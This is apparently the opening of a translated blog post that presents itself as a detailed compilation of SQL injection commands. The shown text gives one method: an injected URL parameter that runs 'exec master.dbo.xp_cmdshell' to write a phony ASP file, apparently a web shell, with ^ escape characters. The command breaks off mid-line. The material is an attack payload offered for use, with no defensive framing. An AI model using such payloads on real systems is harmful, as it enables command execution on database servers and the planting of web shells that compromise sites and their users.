The most detailed SQL injection related command finishing

xiaoxiao2021-03-20  226

Quote:

1. Method of writing an ASP (a phony) file with ^ escape characters:

http://192.168.1.5 /Play.asp?keyno=1881 ;exec master.dbo.xp_cmdshell 'echo ^